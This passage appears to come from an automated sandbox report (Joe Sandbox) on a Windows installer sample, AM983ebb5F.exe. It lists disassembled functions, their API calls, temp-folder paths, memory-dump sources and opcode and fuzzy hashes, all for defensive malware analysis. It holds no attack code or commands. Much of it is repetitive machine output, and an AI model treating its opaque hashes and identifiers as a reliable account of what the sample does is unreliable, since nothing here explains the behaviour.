                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharNext
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsuD53D.tmp
                                                                                    • API String ID: 3213498283-2591292428
                                                                                    • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                    • Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
                                                                                    • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                    • Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA
                                                                                    Function 00405E26 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E48
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 2659869361-3081826266
                                                                                    • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                    • Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
                                                                                    • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                    • Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD
                                                                                    Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll), ref: 0040269A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsuD53D.tmp$C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll
                                                                                    • API String ID: 1659193697-2754003125
                                                                                    • Opcode ID: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
                                                                                    • Instruction ID: 71653ae2733df7adc71dfdbaa34589fb2472b89c06e6b839d1f3baa03dac964a
                                                                                    • Opcode Fuzzy Hash: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
                                                                                    • Instruction Fuzzy Hash: E011E772A40205BBCB00ABB19E56AAE7671AF50748F21443FF402B71C1EAFD4891565E
                                                                                    Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                                                    • GetTickCount.KERNEL32 ref: 0040304F
                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                    • String ID:
                                                                                    • API String ID: 2102729457-0
                                                                                    • Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                    • Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
                                                                                    • Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                    • Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D
                                                                                    Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 0040557F
                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
                                                                                      • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                    • String ID:
                                                                                    • API String ID: 3748168415-3916222277
                                                                                    • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                    • Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
                                                                                    • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                    • Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D
                                                                                    Function 00406425 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406696,80000002), ref: 0040646B
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00406476
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue
                                                                                    • String ID: : Completed
                                                                                    • API String ID: 3356406503-2954849223
                                                                                    • Opcode ID: 2e643289fb710728f9e71b764b537af101e4effe49772c5ab4cbf1728bf19f20
                                                                                    • Instruction ID: 70129269225b3d2074805611e9e9ab3b6623f97616b55adb64abfcd2b3eb4ee3
                                                                                    • Opcode Fuzzy Hash: 2e643289fb710728f9e71b764b537af101e4effe49772c5ab4cbf1728bf19f20
                                                                                    • Instruction Fuzzy Hash: 3F017172540209AADF21CF51CC05EDB3BA8EB54364F114439FD1596190D738D964DBA4
                                                                                    Function 00403B94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00403BB5
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$GlobalLibrary
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 1100898210-3081826266
                                                                                    • Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                                                    • Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
                                                                                    • Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                                                    • Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC
                                                                                    Function 00405E72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\AM983ebb5F.exe,C:\Users\user\Desktop\AM983ebb5F.exe,80000000,00000003), ref: 00405E78
                                                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\AM983ebb5F.exe,C:\Users\user\Desktop\AM983ebb5F.exe,80000000,00000003), ref: 00405E88
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrlen
                                                                                    • String ID: C:\Users\user\Desktop
                                                                                    • API String ID: 2709904686-224404859
                                                                                    • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                    • Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
                                                                                    • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                    • Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC
                                                                                    Function 00405FAC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
                                                                                    • CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 190613189-0
                                                                                    • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                    • Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
                                                                                    • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                    • Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69